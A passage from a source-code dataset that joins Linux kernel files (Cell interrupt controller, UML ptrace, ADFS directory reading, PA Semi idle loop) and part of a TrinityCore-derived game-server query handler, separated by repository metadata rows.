/* Use the highest interrupt priorities for IPI */
static inline int iic_msg_to_irq(int msg)
{
return IIC_IRQ_TYPE_IPI + 0xf - msg;
}
void iic_message_pass(int cpu, int msg)
{
out_be64(&per_cpu(cpu_iic, cpu).regs->generate, (0xf - msg) << 4);
}
struct irq_domain *iic_get_irq_host(int node)
{
return iic_host;
}
EXPORT_SYMBOL_GPL(iic_get_irq_host);
static void iic_request_ipi(int msg)
{
int virq;
virq = irq_create_mapping(iic_host, iic_msg_to_irq(msg));
if (virq == NO_IRQ) {
printk(KERN_ERR
"iic: failed to map IPI %s\n", smp_ipi_name[msg]);
return;
}
/*
* If smp_request_message_ipi encounters an error it will notify
* the error. If a message is not needed it will return non-zero.
*/
if (smp_request_message_ipi(virq, msg))
irq_dispose_mapping(virq);
}
void iic_request_IPIs(void)
{
iic_request_ipi(PPC_MSG_CALL_FUNCTION);
iic_request_ipi(PPC_MSG_RESCHEDULE);
iic_request_ipi(PPC_MSG_CALL_FUNC_SINGLE);
iic_request_ipi(PPC_MSG_DEBUGGER_BREAK);
}
#endif /* CONFIG_SMP */
static int iic_host_match(struct irq_domain *h, struct device_node *node)
{
return of_device_is_compatible(node,
"IBM,CBEA-Internal-Interrupt-Controller");
}
static int iic_host_map(struct irq_domain *h, unsigned int virq,
irq_hw_number_t hw)
{
switch (hw & IIC_IRQ_TYPE_MASK) {
case IIC_IRQ_TYPE_IPI:
irq_set_chip_and_handler(virq, &iic_chip, handle_percpu_irq);
break;
case IIC_IRQ_TYPE_IOEXC:
irq_set_chip_and_handler(virq, &iic_ioexc_chip,
handle_edge_eoi_irq);
break;
default:
irq_set_chip_and_handler(virq, &iic_chip, handle_edge_eoi_irq);
}
return 0;
}
static int iic_host_xlate(struct irq_domain *h, struct device_node *ct,
const u32 *intspec, unsigned int intsize,
irq_hw_number_t *out_hwirq, unsigned int *out_flags)
{
unsigned int node, ext, unit, class;
const u32 *val;
if (!of_device_is_compatible(ct,
"IBM,CBEA-Internal-Interrupt-Controller"))
return -ENODEV;
if (intsize != 1)
return -ENODEV;
val = of_get_property(ct, "#interrupt-cells", NULL);
if (val == NULL || *val != 1)
return -ENODEV;
node = intspec[0] >> 24;
ext = (intspec[0] >> 16) & 0xff;
class = (intspec[0] >> 8) & 0xff;
unit = intspec[0] & 0xff;
/* Check if node is in supported range */
if (node > 1)
return -EINVAL;
/* Build up interrupt number, special case for IO exceptions */
*out_hwirq = (node << IIC_IRQ_NODE_SHIFT);
if (unit == IIC_UNIT_IIC && class == 1)
*out_hwirq |= IIC_IRQ_TYPE_IOEXC | ext;
else
*out_hwirq |= IIC_IRQ_TYPE_NORMAL |
(class << IIC_IRQ_CLASS_SHIFT) | unit;
/* Dummy flags, ignored by iic code */
*out_flags = IRQ_TYPE_EDGE_RISING;
return 0;
}
static const struct irq_domain_ops iic_host_ops = {
.match = iic_host_match,
.map = iic_host_map,
.xlate = iic_host_xlate,
};
static void __init init_one_iic(unsigned int hw_cpu, unsigned long addr,
struct device_node *node)
{
/* XXX FIXME: should locate the linux CPU number from the HW cpu
* number properly. We are lucky for now
*/
struct iic *iic = &per_cpu(cpu_iic, hw_cpu);
iic->regs = ioremap(addr, sizeof(struct cbe_iic_thread_regs));
BUG_ON(iic->regs == NULL);
iic->target_id = ((hw_cpu & 2) << 3) | ((hw_cpu & 1) ? 0xf : 0xe);
iic->eoi_stack[0] = 0xff;
iic->node = of_node_get(node);
out_be64(&iic->regs->prio, 0);
printk(KERN_INFO "IIC for CPU %d target id 0x%x : %s\n",
hw_cpu, iic->target_id, node->full_name);
}
static int __init setup_iic(void)
{
struct device_node *dn;
struct resource r0, r1;
unsigned int node, cascade, found = 0;
struct cbe_iic_regs __iomem *node_iic;
const u32 *np;
for (dn = NULL;
(dn = of_find_node_by_name(dn,"interrupt-controller")) != NULL;) {
if (!of_device_is_compatible(dn,
"IBM,CBEA-Internal-Interrupt-Controller"))
continue;
np = of_get_property(dn, "ibm,interrupt-server-ranges", NULL);
if (np == NULL) {
printk(KERN_WARNING "IIC: CPU association not found\n");
of_node_put(dn);
return -ENODEV;
}
if (of_address_to_resource(dn, 0, &r0) ||
of_address_to_resource(dn, 1, &r1)) {
printk(KERN_WARNING "IIC: Can't resolve addresses\n");
of_node_put(dn);
return -ENODEV;
}
found++;
init_one_iic(np[0], r0.start, dn);
init_one_iic(np[1], r1.start, dn);
/* Setup cascade for IO exceptions. XXX cleanup tricks to get
* node vs CPU etc...
* Note that we configure the IIC_IRR here with a hard coded
* priority of 1. We might want to improve that later.
*/
node = np[0] >> 1;
node_iic = cbe_get_cpu_iic_regs(np[0]);
cascade = node << IIC_IRQ_NODE_SHIFT;
cascade |= 1 << IIC_IRQ_CLASS_SHIFT;
cascade |= IIC_UNIT_IIC;
cascade = irq_create_mapping(iic_host, cascade);
if (cascade == NO_IRQ)
continue;
/*
* irq_data is a generic pointer that gets passed back
* to us later, so the forced cast is fine.
*/
irq_set_handler_data(cascade, (void __force *)node_iic);
irq_set_chained_handler(cascade, iic_ioexc_cascade);
out_be64(&node_iic->iic_ir,
(1 << 12) /* priority */ |
(node << 4) /* dest node */ |
IIC_UNIT_THREAD_0 /* route them to thread 0 */);
/* Flush pending (make sure it triggers if there is
* anything pending
*/
out_be64(&node_iic->iic_is, 0xfffffffffffffffful);
}
if (found)
return 0;
else
return -ENODEV;
}
void __init iic_init_IRQ(void)
{
/* Setup an irq host data structure */
iic_host = irq_domain_add_linear(NULL, IIC_SOURCE_COUNT, &iic_host_ops,
NULL);
BUG_ON(iic_host == NULL);
irq_set_default_host(iic_host);
/* Discover and initialize iics */
if (setup_iic() < 0)
panic("IIC: Failed to initialize !\n");
/* Set master interrupt handling function */
ppc_md.get_irq = iic_get_irq;
/* Enable on current CPU */
iic_setup_cpu();
}
void iic_set_interrupt_routing(int cpu, int thread, int priority)
{
struct cbe_iic_regs __iomem *iic_regs = cbe_get_cpu_iic_regs(cpu);
u64 iic_ir = 0;
int node = cpu >> 1;
/* Set which node and thread will handle the next interrupt */
iic_ir |= CBE_IIC_IR_PRIO(priority) |
CBE_IIC_IR_DEST_NODE(node);
if (thread == 0)
iic_ir |= CBE_IIC_IR_DEST_UNIT(CBE_IIC_IR_PT_0);
else
iic_ir |= CBE_IIC_IR_DEST_UNIT(CBE_IIC_IR_PT_1);
out_be64(&iic_regs->iic_ir, iic_ir);
}
| gpl-2.0 |
samarthp/sam-tenderloin-kernel-3.4 | arch/x86/um/ptrace_64.c | 8705 | 5781 | /*
* Copyright 2003 PathScale, Inc.
* Copyright (C) 2003 - 2007 Jeff Dike (jdike@{addtoit,linux.intel}.com)
*
* Licensed under the GPL
*/
#include <linux/mm.h>
#include <linux/sched.h>
#include <linux/errno.h>
#define __FRAME_OFFSETS
#include <asm/ptrace.h>
#include <asm/uaccess.h>
/*
* determines which flags the user has access to.
* 1 = access 0 = no access
*/
#define FLAG_MASK 0x44dd5UL
static const int reg_offsets[] =
{
[R8 >> 3] = HOST_R8,
[R9 >> 3] = HOST_R9,
[R10 >> 3] = HOST_R10,
[R11 >> 3] = HOST_R11,
[R12 >> 3] = HOST_R12,
[R13 >> 3] = HOST_R13,
[R14 >> 3] = HOST_R14,
[R15 >> 3] = HOST_R15,
[RIP >> 3] = HOST_IP,
[RSP >> 3] = HOST_SP,
[RAX >> 3] = HOST_AX,
[RBX >> 3] = HOST_BX,
[RCX >> 3] = HOST_CX,
[RDX >> 3] = HOST_DX,
[RSI >> 3] = HOST_SI,
[RDI >> 3] = HOST_DI,
[RBP >> 3] = HOST_BP,
[CS >> 3] = HOST_CS,
[SS >> 3] = HOST_SS,
[FS_BASE >> 3] = HOST_FS_BASE,
[GS_BASE >> 3] = HOST_GS_BASE,
[DS >> 3] = HOST_DS,
[ES >> 3] = HOST_ES,
[FS >> 3] = HOST_FS,
[GS >> 3] = HOST_GS,
[EFLAGS >> 3] = HOST_EFLAGS,
[ORIG_RAX >> 3] = HOST_ORIG_AX,
};
int putreg(struct task_struct *child, int regno, unsigned long value)
{
#ifdef TIF_IA32
/*
* Some code in the 64bit emulation may not be 64bit clean.
* Don't take any chances.
*/
if (test_tsk_thread_flag(child, TIF_IA32))
value &= 0xffffffff;
#endif
switch (regno) {
case R8:
case R9:
case R10:
case R11:
case R12:
case R13:
case R14:
case R15:
case RIP:
case RSP:
case RAX:
case RBX:
case RCX:
case RDX:
case RSI:
case RDI:
case RBP:
case ORIG_RAX:
break;
case FS:
case GS:
case DS:
case ES:
case SS:
case CS:
if (value && (value & 3) != 3)
return -EIO;
value &= 0xffff;
break;
case FS_BASE:
case GS_BASE:
if (!((value >> 48) == 0 || (value >> 48) == 0xffff))
return -EIO;
break;
case EFLAGS:
value &= FLAG_MASK;
child->thread.regs.regs.gp[HOST_EFLAGS] |= value;
return 0;
default:
panic("Bad register in putreg(): %d\n", regno);
}
child->thread.regs.regs.gp[reg_offsets[regno >> 3]] = value;
return 0;
}
int poke_user(struct task_struct *child, long addr, long data)
{
if ((addr & 3) || addr < 0)
return -EIO;
if (addr < MAX_REG_OFFSET)
return putreg(child, addr, data);
else if ((addr >= offsetof(struct user, u_debugreg[0])) &&
(addr <= offsetof(struct user, u_debugreg[7]))) {
addr -= offsetof(struct user, u_debugreg[0]);
addr = addr >> 2;
if ((addr == 4) || (addr == 5))
return -EIO;
child->thread.arch.debugregs[addr] = data;
return 0;
}
return -EIO;
}
unsigned long getreg(struct task_struct *child, int regno)
{
unsigned long mask = ~0UL;
#ifdef TIF_IA32
if (test_tsk_thread_flag(child, TIF_IA32))
mask = 0xffffffff;
#endif
switch (regno) {
case R8:
case R9:
case R10:
case R11:
case R12:
case R13:
case R14:
case R15:
case RIP:
case RSP:
case RAX:
case RBX:
case RCX:
case RDX:
case RSI:
case RDI:
case RBP:
case ORIG_RAX:
case EFLAGS:
case FS_BASE:
case GS_BASE:
break;
case FS:
case GS:
case DS:
case ES:
case SS:
case CS:
mask = 0xffff;
break;
default:
panic("Bad register in getreg: %d\n", regno);
}
return mask & child->thread.regs.regs.gp[reg_offsets[regno >> 3]];
}
int peek_user(struct task_struct *child, long addr, long data)
{
/* read the word at location addr in the USER area. */
unsigned long tmp;
if ((addr & 3) || addr < 0)
return -EIO;
tmp = 0; /* Default return condition */
if (addr < MAX_REG_OFFSET)
tmp = getreg(child, addr);
else if ((addr >= offsetof(struct user, u_debugreg[0])) &&
(addr <= offsetof(struct user, u_debugreg[7]))) {
addr -= offsetof(struct user, u_debugreg[0]);
addr = addr >> 2;
tmp = child->thread.arch.debugregs[addr];
}
return put_user(tmp, (unsigned long *) data);
}
/* XXX Mostly copied from sys-i386 */
int is_syscall(unsigned long addr)
{
unsigned short instr;
int n;
n = copy_from_user(&instr, (void __user *) addr, sizeof(instr));
if (n) {
/*
* access_process_vm() grants access to vsyscall and stub,
* while copy_from_user doesn't. Maybe access_process_vm is
* slow, but that doesn't matter, since it will be called only
* in case of singlestepping, if copy_from_user failed.
*/
n = access_process_vm(current, addr, &instr, sizeof(instr), 0);
if (n != sizeof(instr)) {
printk("is_syscall : failed to read instruction from "
"0x%lx\n", addr);
return 1;
}
}
/* sysenter */
return instr == 0x050f;
}
static int get_fpregs(struct user_i387_struct __user *buf, struct task_struct *child)
{
int err, n, cpu = ((struct thread_info *) child->stack)->cpu;
long fpregs[HOST_FP_SIZE];
BUG_ON(sizeof(*buf) != sizeof(fpregs));
err = save_fp_registers(userspace_pid[cpu], fpregs);
if (err)
return err;
n = copy_to_user(buf, fpregs, sizeof(fpregs));
if (n > 0)
return -EFAULT;
return n;
}
static int set_fpregs(struct user_i387_struct __user *buf, struct task_struct *child)
{
int n, cpu = ((struct thread_info *) child->stack)->cpu;
long fpregs[HOST_FP_SIZE];
BUG_ON(sizeof(*buf) != sizeof(fpregs));
n = copy_from_user(fpregs, buf, sizeof(fpregs));
if (n > 0)
return -EFAULT;
return restore_fp_registers(userspace_pid[cpu], fpregs);
}
long subarch_ptrace(struct task_struct *child, long request,
unsigned long addr, unsigned long data)
{
int ret = -EIO;
void __user *datap = (void __user *) data;
switch (request) {
case PTRACE_GETFPREGS: /* Get the child FPU state. */
ret = get_fpregs(datap, child);
break;
case PTRACE_SETFPREGS: /* Set the child FPU state. */
ret = set_fpregs(datap, child);
break;
case PTRACE_ARCH_PRCTL:
/* XXX Calls ptrace on the host - needs some SMP thinking */
ret = arch_prctl(child, data, (void __user *) addr);
break;
}
return ret;
}
| gpl-2.0 |
CyanogenMod/android_kernel_sony_msm7x27a-legacy | fs/adfs/dir_fplus.c | 11009 | 6392 | /*
* linux/fs/adfs/dir_fplus.c
*
* Copyright (C) 1997-1999 Russell King
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2 as
* published by the Free Software Foundation.
*/
#include <linux/buffer_head.h>
#include <linux/slab.h>
#include "adfs.h"
#include "dir_fplus.h"
static int
adfs_fplus_read(struct super_block *sb, unsigned int id, unsigned int sz, struct adfs_dir *dir)
{
struct adfs_bigdirheader *h;
struct adfs_bigdirtail *t;
unsigned long block;
unsigned int blk, size;
int i, ret = -EIO;
dir->nr_buffers = 0;
/* start off using fixed bh set - only alloc for big dirs */
dir->bh_fplus = &dir->bh[0];
block = __adfs_block_map(sb, id, 0);
if (!block) {
adfs_error(sb, "dir object %X has a hole at offset 0", id);
goto out;
}
dir->bh_fplus[0] = sb_bread(sb, block);
if (!dir->bh_fplus[0])
goto out;
dir->nr_buffers += 1;
h = (struct adfs_bigdirheader *)dir->bh_fplus[0]->b_data;
size = le32_to_cpu(h->bigdirsize);
if (size != sz) {
printk(KERN_WARNING "adfs: adfs_fplus_read:"
" directory header size %X\n"
" does not match directory size %X\n",
size, sz);
}
if (h->bigdirversion[0] != 0 || h->bigdirversion[1] != 0 ||
h->bigdirversion[2] != 0 || size & 2047 ||
h->bigdirstartname != cpu_to_le32(BIGDIRSTARTNAME)) {
printk(KERN_WARNING "adfs: dir object %X has"
" malformed dir header\n", id);
goto out;
}
size >>= sb->s_blocksize_bits;
if (size > sizeof(dir->bh)/sizeof(dir->bh[0])) {
/* this directory is too big for fixed bh set, must allocate */
struct buffer_head **bh_fplus =
kzalloc(size * sizeof(struct buffer_head *),
GFP_KERNEL);
if (!bh_fplus) {
adfs_error(sb, "not enough memory for"
" dir object %X (%d blocks)", id, size);
goto out;
}
dir->bh_fplus = bh_fplus;
/* copy over the pointer to the block that we've already read */
dir->bh_fplus[0] = dir->bh[0];
}
for (blk = 1; blk < size; blk++) {
block = __adfs_block_map(sb, id, blk);
if (!block) {
adfs_error(sb, "dir object %X has a hole at offset %d", id, blk);
goto out;
}
dir->bh_fplus[blk] = sb_bread(sb, block);
if (!dir->bh_fplus[blk]) {
adfs_error(sb, "dir object %X failed read for"
" offset %d, mapped block %X",
id, blk, block);
goto out;
}
dir->nr_buffers += 1;
}
t = (struct adfs_bigdirtail *)
(dir->bh_fplus[size - 1]->b_data + (sb->s_blocksize - 8));
if (t->bigdirendname != cpu_to_le32(BIGDIRENDNAME) ||
t->bigdirendmasseq != h->startmasseq ||
t->reserved[0] != 0 || t->reserved[1] != 0) {
printk(KERN_WARNING "adfs: dir object %X has "
"malformed dir end\n", id);
goto out;
}
dir->parent_id = le32_to_cpu(h->bigdirparent);
dir->sb = sb;
return 0;
out:
if (dir->bh_fplus) {
for (i = 0; i < dir->nr_buffers; i++)
brelse(dir->bh_fplus[i]);
if (&dir->bh[0] != dir->bh_fplus)
kfree(dir->bh_fplus);
dir->bh_fplus = NULL;
}
dir->nr_buffers = 0;
dir->sb = NULL;
return ret;
}
static int
adfs_fplus_setpos(struct adfs_dir *dir, unsigned int fpos)
{
struct adfs_bigdirheader *h =
(struct adfs_bigdirheader *) dir->bh_fplus[0]->b_data;
int ret = -ENOENT;
if (fpos <= le32_to_cpu(h->bigdirentries)) {
dir->pos = fpos;
ret = 0;
}
return ret;
}
static void
dir_memcpy(struct adfs_dir *dir, unsigned int offset, void *to, int len)
{
struct super_block *sb = dir->sb;
unsigned int buffer, partial, remainder;
buffer = offset >> sb->s_blocksize_bits;
offset &= sb->s_blocksize - 1;
partial = sb->s_blocksize - offset;
if (partial >= len)
memcpy(to, dir->bh_fplus[buffer]->b_data + offset, len);
else {
char *c = (char *)to;
remainder = len - partial;
memcpy(c,
dir->bh_fplus[buffer]->b_data + offset,
partial);
memcpy(c + partial,
dir->bh_fplus[buffer + 1]->b_data,
remainder);
}
}
static int
adfs_fplus_getnext(struct adfs_dir *dir, struct object_info *obj)
{
struct adfs_bigdirheader *h =
(struct adfs_bigdirheader *) dir->bh_fplus[0]->b_data;
struct adfs_bigdirentry bde;
unsigned int offset;
int i, ret = -ENOENT;
if (dir->pos >= le32_to_cpu(h->bigdirentries))
goto out;
offset = offsetof(struct adfs_bigdirheader, bigdirname);
offset += ((le32_to_cpu(h->bigdirnamelen) + 4) & ~3);
offset += dir->pos * sizeof(struct adfs_bigdirentry);
dir_memcpy(dir, offset, &bde, sizeof(struct adfs_bigdirentry));
obj->loadaddr = le32_to_cpu(bde.bigdirload);
obj->execaddr = le32_to_cpu(bde.bigdirexec);
obj->size = le32_to_cpu(bde.bigdirlen);
obj->file_id = le32_to_cpu(bde.bigdirindaddr);
obj->attr = le32_to_cpu(bde.bigdirattr);
obj->name_len = le32_to_cpu(bde.bigdirobnamelen);
offset = offsetof(struct adfs_bigdirheader, bigdirname);
offset += ((le32_to_cpu(h->bigdirnamelen) + 4) & ~3);
offset += le32_to_cpu(h->bigdirentries) * sizeof(struct adfs_bigdirentry);
offset += le32_to_cpu(bde.bigdirobnameptr);
dir_memcpy(dir, offset, obj->name, obj->name_len);
for (i = 0; i < obj->name_len; i++)
if (obj->name[i] == '/')
obj->name[i] = '.';
obj->filetype = -1;
/*
* object is a file and is filetyped and timestamped?
* RISC OS 12-bit filetype is stored in load_address[19:8]
*/
if ((0 == (obj->attr & ADFS_NDA_DIRECTORY)) &&
(0xfff00000 == (0xfff00000 & obj->loadaddr))) {
obj->filetype = (__u16) ((0x000fff00 & obj->loadaddr) >> 8);
/* optionally append the ,xyz hex filetype suffix */
if (ADFS_SB(dir->sb)->s_ftsuffix)
obj->name_len +=
append_filetype_suffix(
&obj->name[obj->name_len],
obj->filetype);
}
dir->pos += 1;
ret = 0;
out:
return ret;
}
static int
adfs_fplus_sync(struct adfs_dir *dir)
{
int err = 0;
int i;
for (i = dir->nr_buffers - 1; i >= 0; i--) {
struct buffer_head *bh = dir->bh_fplus[i];
sync_dirty_buffer(bh);
if (buffer_req(bh) && !buffer_uptodate(bh))
err = -EIO;
}
return err;
}
static void
adfs_fplus_free(struct adfs_dir *dir)
{
int i;
if (dir->bh_fplus) {
for (i = 0; i < dir->nr_buffers; i++)
brelse(dir->bh_fplus[i]);
if (&dir->bh[0] != dir->bh_fplus)
kfree(dir->bh_fplus);
dir->bh_fplus = NULL;
}
dir->nr_buffers = 0;
dir->sb = NULL;
}
struct adfs_dir_ops adfs_fplus_dir_ops = {
.read = adfs_fplus_read,
.setpos = adfs_fplus_setpos,
.getnext = adfs_fplus_getnext,
.sync = adfs_fplus_sync,
.free = adfs_fplus_free
};
| gpl-2.0 |
VeryLettuce/LG_F120K_Kernel | arch/powerpc/platforms/pasemi/idle.c | 13569 | 2410 | /*
* Copyright (C) 2006-2007 PA Semi, Inc
*
* Maintained by: Olof Johansson <olof@lixom.net>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2 as
* published by the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*
*/
#undef DEBUG
#include <linux/kernel.h>
#include <linux/string.h>
#include <linux/irq.h>
#include <asm/machdep.h>
#include <asm/reg.h>
#include <asm/smp.h>
#include "pasemi.h"
struct sleep_mode {
char *name;
void (*entry)(void);
};
static struct sleep_mode modes[] = {
{ .name = "spin", .entry = &idle_spin },
{ .name = "doze", .entry = &idle_doze },
};
static int current_mode = 0;
static int pasemi_system_reset_exception(struct pt_regs *regs)
{
/* If we were woken up from power savings, we need to return
* to the calling function, since nip is not saved across
* all modes.
*/
if (regs->msr & SRR1_WAKEMASK)
regs->nip = regs->link;
switch (regs->msr & SRR1_WAKEMASK) {
case SRR1_WAKEEE:
do_IRQ(regs);
break;
case SRR1_WAKEDEC:
timer_interrupt(regs);
break;
default:
/* do system reset */
return 0;
}
/* Set higher astate since we come out of power savings at 0 */
restore_astate(hard_smp_processor_id());
/* everything handled */
regs->msr |= MSR_RI;
return 1;
}
static int __init pasemi_idle_init(void)
{
#ifndef CONFIG_PPC_PASEMI_CPUFREQ
printk(KERN_WARNING "No cpufreq driver, powersavings modes disabled\n");
current_mode = 0;
#endif
ppc_md.system_reset_exception = pasemi_system_reset_exception;
ppc_md.power_save = modes[current_mode].entry;
printk(KERN_INFO "Using PA6T idle loop (%s)\n", modes[current_mode].name);
return 0;
}
machine_late_initcall(pasemi, pasemi_idle_init);
static int __init idle_param(char *p)
{
int i;
for (i = 0; i < ARRAY_SIZE(modes); i++) {
if (!strcmp(modes[i].name, p)) {
current_mode = i;
break;
}
}
return 0;
}
early_param("idle", idle_param);
| gpl-2.0 |
InfinityCore/InfinityCore243 | src/server/game/Handlers/QueryHandler.cpp | 2 | 13906 | /*
* Copyright (C) 2008-2013 Trinitycore <http://www.trinitycore.org/>
* Copyright (C) 2009-2014 Infinitycore <http://www.infinitycore.org/>
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation; either version 2 of the License, or (at your
* option) any later version.
*
* This program is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
* more details.
*
* You should have received a copy of the GNU General Public License along
* with this program. If not, see <http://www.gnu.org/licenses/>.
*/
#include "Common.h"
#include "Language.h"
#include "DatabaseEnv.h"
#include "WorldPacket.h"
#include "WorldSession.h"
#include "Opcodes.h"
#include "Log.h"
#include "World.h"
#include "ObjectMgr.h"
#include "Player.h"
#include "UpdateMask.h"
#include "NPCHandler.h"
#include "Pet.h"
#include "MapManager.h"
void WorldSession::SendNameQueryOpcode(uint64 guid)
{
Player* player = ObjectAccessor::FindPlayer(guid);
CharacterNameData const* nameData = sWorld->GetCharacterNameData(GUID_LOPART(guid));
WorldPacket data(SMSG_NAME_QUERY_RESPONSE, (8+1+1+1+1+1+10));
data.appendPackGUID(guid);
if (!nameData)
{
data << uint8(1); // name unknown
SendPacket(&data);
return;
}
data << uint8(0); // name known
data << nameData->m_name; // played name
data << uint8(0); // realm name - only set for cross realm interaction (such as Battlegrounds)
data << uint8(nameData->m_race);
data << uint8(nameData->m_gender);
data << uint8(nameData->m_class);
if (DeclinedName const* names = (player ? player->GetDeclinedNames() : NULL))
{
data << uint8(1); // Name is declined
for (uint8 i = 0; i < MAX_DECLINED_NAME_CASES; ++i)
data << names->name[i];
}
else
data << uint8(0); // Name is not declined
SendPacket(&data);
}
void WorldSession::HandleNameQueryOpcode(WorldPacket& recvData)
{
uint64 guid;
recvData >> guid;
// This is disable by default to prevent lots of console spam
// IC_LOG_INFO("network", "HandleNameQueryOpcode %u", guid);
SendNameQueryOpcode(guid);
}
void WorldSession::HandleQueryTimeOpcode(WorldPacket & /*recvData*/)
{
SendQueryTimeResponse();
}
void WorldSession::SendQueryTimeResponse()
{
WorldPacket data(SMSG_QUERY_TIME_RESPONSE, 4+4);
data << uint32(time(NULL));
data << uint32(sWorld->GetNextDailyQuestsResetTime() - time(NULL));
SendPacket(&data);
}
/// Only _static_ data is sent in this packet !!!
void WorldSession::HandleCreatureQueryOpcode(WorldPacket& recvData)
{
uint32 entry;
recvData >> entry;
uint64 guid;
recvData >> guid;
CreatureTemplate const* ci = sObjectMgr->GetCreatureTemplate(entry);
if (ci)
{
std::string Name, SubName;
Name = ci->Name;
SubName = ci->SubName;
int loc_idx = GetSessionDbLocaleIndex();
if (loc_idx >= 0)
{
if (CreatureLocale const* cl = sObjectMgr->GetCreatureLocale(entry))
{
ObjectMgr::GetLocaleString(cl->Name, loc_idx, Name);
ObjectMgr::GetLocaleString(cl->SubName, loc_idx, SubName);
}
}
IC_LOG_DEBUG("network", "WORLD: CMSG_CREATURE_QUERY '%s' - Entry: %u.", ci->Name.c_str(), entry);
// guess size
WorldPacket data(SMSG_CREATURE_QUERY_RESPONSE, 100);
data << uint32(entry); // creature entry
data << Name;
data << uint8(0) << uint8(0) << uint8(0); // name2, name3, name4, always empty
data << SubName;
data << ci->IconName; // "Directions" for guard, string for Icons 2.3.0
data << uint32(ci->type_flags); // flags
data << uint32(ci->type); // CreatureType.dbc
data << uint32(ci->family); // CreatureFamily.dbc
data << uint32(ci->rank); // Creature Rank (elite, boss, etc)
data << uint32(ci->KillCredit[0]); // new in 3.1, kill credit
data << uint32(ci->KillCredit[1]); // new in 3.1, kill credit
data << uint32(ci->Modelid1); // Modelid1
data << uint32(ci->Modelid2); // Modelid2
data << uint32(ci->Modelid3); // Modelid3
data << uint32(ci->Modelid4); // Modelid4
data << float(ci->ModHealth); // dmg/hp modifier
data << float(ci->ModMana); // dmg/mana modifier
data << uint8(ci->RacialLeader);
for (uint32 i = 0; i < MAX_CREATURE_QUEST_ITEMS; ++i)
data << uint32(ci->questItems[i]); // itemId[6], quest drop
data << uint32(ci->movementId); // CreatureMovementInfo.dbc
SendPacket(&data);
IC_LOG_DEBUG("network", "WORLD: Sent SMSG_CREATURE_QUERY_RESPONSE");
}
else
{
IC_LOG_DEBUG("network", "WORLD: CMSG_CREATURE_QUERY - NO CREATURE INFO! (GUID: %u, ENTRY: %u)",
GUID_LOPART(guid), entry);
WorldPacket data(SMSG_CREATURE_QUERY_RESPONSE, 4);
data << uint32(entry | 0x80000000);
SendPacket(&data);
IC_LOG_DEBUG("network", "WORLD: Sent SMSG_CREATURE_QUERY_RESPONSE");
}
}
/// Only _static_ data is sent in this packet !!!
void WorldSession::HandleGameObjectQueryOpcode(WorldPacket& recvData)
{
uint32 entry;
recvData >> entry;
uint64 guid;
recvData >> guid;
const GameObjectTemplate* info = sObjectMgr->GetGameObjectTemplate(entry);
if (info)
{
std::string Name;
std::string IconName;
std::string CastBarCaption;
Name = info->name;
IconName = info->IconName;
CastBarCaption = info->castBarCaption;
int loc_idx = GetSessionDbLocaleIndex();
if (loc_idx >= 0)
{
if (GameObjectLocale const* gl = sObjectMgr->GetGameObjectLocale(entry))
{
ObjectMgr::GetLocaleString(gl->Name, loc_idx, Name);
ObjectMgr::GetLocaleString(gl->CastBarCaption, loc_idx, CastBarCaption);
}
}
IC_LOG_DEBUG("network", "WORLD: CMSG_GAMEOBJECT_QUERY '%s' - Entry: %u. ", info->name.c_str(), entry);
WorldPacket data (SMSG_GAMEOBJECT_QUERY_RESPONSE, 150);
data << uint32(entry);
data << uint32(info->type);
data << uint32(info->displayId);
data << Name;
data << uint8(0) << uint8(0) << uint8(0); // name2, name3, name4
data << IconName; // 2.0.3, string. Icon name to use instead of default icon for go's (ex: "Attack" makes sword)
data << CastBarCaption; // 2.0.3, string. Text will appear in Cast Bar when using GO (ex: "Collecting")
data << info->unk1; // 2.0.3, string
data.append(info->raw.data, MAX_GAMEOBJECT_DATA);
data << float(info->size); // go size
for (uint32 i = 0; i < MAX_GAMEOBJECT_QUEST_ITEMS; ++i)
data << uint32(info->questItems[i]); // itemId[6], quest drop
SendPacket(&data);
IC_LOG_DEBUG("network", "WORLD: Sent SMSG_GAMEOBJECT_QUERY_RESPONSE");
}
else
{
IC_LOG_DEBUG("network", "WORLD: CMSG_GAMEOBJECT_QUERY - Missing gameobject info for (GUID: %u, ENTRY: %u)",
GUID_LOPART(guid), entry);
WorldPacket data (SMSG_GAMEOBJECT_QUERY_RESPONSE, 4);
data << uint32(entry | 0x80000000);
SendPacket(&data);
IC_LOG_DEBUG("network", "WORLD: Sent SMSG_GAMEOBJECT_QUERY_RESPONSE");
}
}
void WorldSession::HandleCorpseQueryOpcode(WorldPacket & /*recvData*/)
{
IC_LOG_DEBUG("network", "WORLD: Received MSG_CORPSE_QUERY");
Corpse* corpse = GetPlayer()->GetCorpse();
if (!corpse)
{
WorldPacket data(MSG_CORPSE_QUERY, 1);
data << uint8(0); // corpse not found
SendPacket(&data);
return;
}
uint32 mapid = corpse->GetMapId();
float x = corpse->GetPositionX();
float y = corpse->GetPositionY();
float z = corpse->GetPositionZ();
uint32 corpsemapid = mapid;
// if corpse at different map
if (mapid != _player->GetMapId())
{
// search entrance map for proper show entrance
if (MapEntry const* corpseMapEntry = sMapStore.LookupEntry(mapid))
{
if (corpseMapEntry->IsDungeon() && corpseMapEntry->entrance_map >= 0)
{
// if corpse map have entrance
if (Map const* entranceMap = sMapMgr->CreateBaseMap(corpseMapEntry->entrance_map))
{
mapid = corpseMapEntry->entrance_map;
x = corpseMapEntry->entrance_x;
y = corpseMapEntry->entrance_y;
z = entranceMap->GetHeight(x, y, MAX_HEIGHT);
}
}
}
}
WorldPacket data(MSG_CORPSE_QUERY, 1+(6*4));
data << uint8(1); // corpse found
data << int32(mapid);
data << float(x);
data << float(y);
data << float(z);
data << int32(corpsemapid);
data << uint32(0); // unknown
SendPacket(&data);
}
void WorldSession::HandleNpcTextQueryOpcode(WorldPacket& recvData)
{
uint32 textID;
uint64 guid;
recvData >> textID;
IC_LOG_DEBUG("network", "WORLD: CMSG_NPC_TEXT_QUERY ID '%u'", textID);
recvData >> guid;
